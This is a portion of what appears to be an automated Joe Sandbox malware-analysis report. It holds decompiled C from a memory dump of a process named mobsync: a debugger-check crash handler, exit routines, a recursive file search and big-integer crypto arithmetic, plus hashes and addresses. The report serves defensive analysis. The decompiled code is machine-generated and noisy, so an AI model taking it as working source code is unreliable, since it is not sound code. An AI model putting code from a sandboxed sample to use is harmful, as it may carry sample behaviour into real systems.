					E0042F21A(_t57);
				}
				return E0042F61B(_v8 ^ _t70);
			}

0x004360a3
0x004360a3
0x004360a3
0x004360a3
0x004360ae
0x004360b3
0x004360b5
0x004360bd
0x004360bf
0x004360c2
0x004360c7
0x004360c7
0x004360d3
0x004360e6
0x004360f4
0x004360fa
0x00436100
0x00436106
0x0043610c
0x00436112
0x00436118
0x0043611e
0x00436124
0x0043612a
0x00436131
0x00436138
0x0043613f
0x00436146
0x0043614d
0x00436154
0x00436155
0x0043615e
0x00436164
0x00436167
0x0043616d
0x0043617a
0x00436183
0x0043618c
0x00436195
0x004361a3
0x004361a5
0x004361ba
0x004361c6
0x004361c9
0x004361ce
0x004361dd

APIs

IsDebuggerPresent.KERNEL32 ref: 0043619B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004361A5
UnhandledExceptionFilter.KERNEL32(?), ref: 004361B2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
Instruction ID: 9cb4660ce58b979cd107c23742a1d206b3c76e673fdfde5e893b08115a718fab
Opcode Fuzzy Hash: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
Instruction Fuzzy Hash: 3531057490122DABCB21DF65DC8979DBBB8BF08310F5081EAE40CA7261E7349F858F58

Uniqueness

Uniqueness Score: -1.00%

Function 0043B789, Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043B789(int _a4) {
				void* _t14;
				void* _t16;

				if(E00441445(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0043B80E(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x0043b795
0x0043b7b1
0x0043b7b1
0x0043b7ba
0x0043b7c3

APIs

GetCurrentProcess.KERNEL32(?,?,0043B75F,?,00468178,0000000C,0043B8B6,?,00000002,00000000), ref: 0043B7AA
TerminateProcess.KERNEL32(00000000,?,0043B75F,?,00468178,0000000C,0043B8B6,?,00000002,00000000), ref: 0043B7B1
ExitProcess.KERNEL32 ref: 0043B7C3

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
Instruction ID: 91f09eb10ad8882fafd7c3a50809be48a5acae071be7bd6b9a99ec4421295efe
Opcode Fuzzy Hash: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
Instruction Fuzzy Hash: D9E0B631400648ABCF12AF55DD0AA993B69EF94787F004065FA058A632CB39DE92CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004456A9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004456A9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = L0043DFD9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0044C479(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E004458E8(_a16, __eflags, _t111);
							L0043EE85(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0044C479(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043629A();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46a00c; // 0x44c884ad
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = L0044ED70(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00431810(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E004456A9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0044E990(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00445501);
									}
								} else {
									_push(_t55);
									_t57 = E004456A9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E004456A9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E0042F61B(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x004456ae
0x004456af
0x004456b2
0x004456b2
0x004456b5
0x004456b5
0x004456b7
0x004456b8
0x004456c1
0x004456c2
0x004456c5
0x004456c8
0x004456cd
0x004456d4
0x004456d5
0x004456d6
0x004456d9
0x004456e3
0x004456e6
0x004456e7
0x004456e9
0x004456fd
0x004456fd
0x00445700
0x0044570a
0x0044570f
0x00445712
0x00445714
0x00000000
0x00445716
0x0044571a
0x00445723
0x00445729
0x00000000
0x0044572c
0x004456eb
0x004456eb
0x004456f1
0x004456f6
0x004456f9
0x004456fb
0x00445732
0x00445734
0x00445735
0x00445736
0x00445737
0x00445738
0x00445739
0x0044573e
0x00445742
0x00445744
0x0044574a
0x00445751
0x00445754
0x00445757
0x00445758
0x0044575b
0x0044575c
0x0044575f
0x00445760
0x00445781
0x00445781
0x00445783
0x00000000
0x00000000
0x00445768
0x0044576a
0x0044576c
0x0044576e
0x00445770
0x00445772
0x00445774
0x0044577f
0x00000000
0x0044577f
0x00445774
0x00445770
0x00000000
0x0044576c
0x00445785
0x00445787
0x0044578a
0x004457a3
0x004457a3
0x004457a5
0x004457a8
0x004457b8
0x004457ba
0x004457ba
0x004457aa
0x004457aa
0x004457ad
0x00000000
0x004457af
0x004457af
0x004457b2
0x00000000
0x004457b4
0x004457b4
0x004457b4
0x004457b2
0x004457ad
0x004457c0
0x004457c8
0x004457cc
0x004457da
0x004457df
0x004457f4
0x004457f6
0x004457fc
0x004457ff
0x00445831
0x00445831
0x00445833
0x00445836
0x0044583c
0x0044583c
0x00445843
0x0044585d
0x0044585d
0x0044586c
0x00445871
0x00445874
0x00445876
0x00000000
0x00000000
0x00000000
0x00000000
0x00445845
0x00445845
0x0044584b
0x0044584d
0x00000000
0x0044584f
0x0044584f
0x00445852
0x00000000
0x00445854
0x00445854
0x0044585b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044585b
0x00445852
0x0044584d
0x00000000
0x00445878
0x00445880
0x00445886
0x00445888
0x00445888
0x00445890
0x00445895
0x0044589d
0x004458a0
0x004458a2
0x004458b6
0x004458bb
0x00445801
0x00445801
0x00445805
0x0044580d
0x0044580d
0x0044580d
0x0044580f
0x00445812
0x00445815
0x00445815
0x0044578c
0x0044578f
0x00445791
0x00000000
0x00445793
0x00445793
0x00445799
0x0044579e
0x00445791
0x00445822
0x0044582d
0x00000000
0x00000000
0x00000000
0x004456fb
0x004456cf
0x004456d1
0x0044572d
0x00445731
0x00445731
0x00000000

Strings

., xrefs: 0044583C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 437c19c35f0951c0f6ce22e054942b2f871d936141d6423c1f4721021dad1fee
Instruction ID: 54e1ff27b0794a04e6664ebc203bfd0683b4301610c99da3dbe1c0a207b24f1c
Opcode Fuzzy Hash: 437c19c35f0951c0f6ce22e054942b2f871d936141d6423c1f4721021dad1fee
Instruction Fuzzy Hash: F5312871800609AFDF249E79CC84DFB7BBDDB86318F1401AEF919D7252E6349D448B54

Uniqueness

Uniqueness Score: -1.00%

Function 0043E6E0, Relevance: 3.5, APIs: 2, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0043E6E0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffff1009
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00450630(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E004502B0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E004500B0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E004500B0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x44d6d9
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E004502B0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0044D906(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0044D906(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0044D906(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0043e6ec
0x0043e6ef
0x0043e6f3
0x0043e6fd
0x0043e700
0x0043e702
0x0043e704
0x0043e711
0x0043e711
0x0043e714
0x0043e714
0x0043e717
0x0043e71a
0x0043e71c
0x0043e84f
0x0043e851
0x0043e89a
0x0043e89e
0x0043e8a4
0x0043e853
0x0043e855
0x0043e858
0x0043e85a
0x0043e85d
0x0043e85f
0x0043e861
0x0043e895
0x0043e895
0x0043e895
0x0043e863
0x0043e868
0x0043e86e
0x0043e86e
0x0043e871
0x0043e873
0x0043e875
0x00000000
0x00000000
0x0043e877
0x0043e878
0x0043e87b
0x0043e87e
0x0043e880
0x00000000
0x0043e882
0x00000000
0x0043e882
0x00000000
0x0043e880
0x0043e884
0x0043e88b
0x0043e88f
0x0043e893
0x00000000
0x00000000
0x0043e893
0x0043e896
0x0043e896
0x0043e898
0x0043e8a5
0x0043e8a8
0x0043e8ab
0x0043e8ae
0x0043e8ae
0x0043e8b2
0x0043e8b5
0x0043e8b8
0x0043e8bb
0x0043e8c6
0x0043e8bd
0x0043e8c2
0x0043e8c2
0x0043e8d0
0x0043e8d5
0x0043e8d8
0x0043e8da
0x0043e8e4
0x0043e8e7
0x0043e8ee
0x0043e8f1
0x0043e8f4
0x0043e8fc
0x0043e902
0x0043e902
0x0043e902
0x0043e902
0x0043e8f4
0x0043e907
0x0043e90e
0x0043e90e
0x0043e911
0x0043e914
0x0043eb46
0x0043eb46
0x0043e91a
0x0043e91a
0x0043e920
0x0043e923
0x0043e926
0x0043e929
0x0043e92c
0x0043e92f
0x0043e932
0x0043e932
0x0043e935
0x0043e93c
0x0043e93c
0x0043e937
0x0043e937
0x0043e937
0x0043e93e
0x0043e942
0x0043e945
0x0043e947
0x0043e94a
0x0043e951
0x0043e954
0x0043e957
0x0043e962
0x0043e965
0x0043e96a
0x0043e96f
0x0043e976
0x0043e97b
0x0043e97d
0x0043e97f
0x0043e983
0x0043e986
0x0043e989
0x0043e991
0x0043e99a
0x0043e99a
0x0043e99c
0x0043e99f
0x0043e99f
0x0043e989
0x0043e9a9
0x0043e9ae
0x0043e9b3
0x0043e9b5
0x0043e9b8
0x0043e9ba
0x0043e9bd
0x0043e9c0
0x0043e9c2
0x0043e9c5
0x0043e9c8
0x0043e9ca
0x0043e9d1
0x0043e9d6
0x0043e9d9
0x0043e9e3
0x0043e9e5
0x0043e9e7
0x0043e9ea
0x0043e9ea
0x0043e9ec
0x0043e9ef
0x0043e9f2
0x0043e9f5
0x0043e9f8
0x0043e9cc
0x0043e9cc
0x0043e9cf
0x00000000
0x00000000
0x0043e9cf
0x0043e9fb
0x0043e9fd
0x0043e9ff
0x00000000
0x0043ea01
0x0043ea01
0x0043ea04
0x0043ea06
0x0043ea06
0x0043ea14
0x0043ea17
0x0043ea1c
0x0043ea1e
0x00000000
0x00000000
0x0043ea20
0x0043ea27
0x0043ea27
0x0043ea2a
0x0043ea2d
0x0043ea30
0x0043ea33
0x0043ea33
0x0043ea36
0x0043ea39
0x0043ea3d
0x0043ea40
0x0043ea42
0x0043ea45
0x00000000
0x00000000
0x0043ea47
0x0043ea45
0x0043ea22
0x0043ea22
0x0043ea25
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ea25
0x0043ea4c
0x0043ea4c
0x00000000
0x0043ea4c
0x0043ea49
0x00000000
0x0043ea49
0x0043ea04
0x0043e9ff
0x0043ea4f
0x0043ea4f
0x0043ea51
0x0043ea5b
0x0043ea5b
0x0043ea5e
0x0043ea60
0x0043ea62
0x0043ea64
0x0043ea69
0x0043ea6c
0x0043ea6c
0x0043ea6f
0x0043ea72
0x0043ea75
0x0043ea77
0x0043ea8c
0x0043ea8e
0x0043ea90
0x0043ea92
0x0043ea94
0x0043ea96
0x0043ea98
0x0043ea9a
0x0043ea9d
0x0043ea9d
0x0043eaa1
0x0043eaa3
0x0043eaa9
0x0043eaac
0x0043eaac
0x0043eaac
0x0043eab0
0x0043eab0
0x0043eab5
0x0043eab8
0x0043eab8
0x0043eabd
0x0043eabf
0x0043eac1
0x0043eac8
0x0043eac8
0x0043eaca
0x0043eacf
0x0043ead1
0x0043ead4
0x0043ead4
0x0043ead7
0x0043eae0
0x0043eae0
0x0043eae2
0x0043eae2
0x0043eae7
0x0043eaed
0x0043eaf1
0x0043eaf4
0x0043eaf7
0x0043eaf9
0x0043eaf9
0x0043eaf9
0x0043eafe
0x0043eafe
0x0043eb01
0x0043eb04
0x0043eac3
0x0043eac3
0x0043eac6
0x00000000
0x00000000
0x0043eac6
0x0043eac1
0x0043eb0b
0x0043eb0b
0x0043eb0c
0x0043ea53
0x0043ea53
0x0043ea55
0x00000000
0x00000000
0x0043ea55
0x0043eb1c
0x0043eb21
0x0043eb24
0x0043eb28
0x0043eb29
0x0043eb2c
0x0043eb2f
0x0043eb30
0x0043eb33
0x0043eb36
0x0043eb39
0x0043eb3c
0x0043eb3c
0x0043eb44
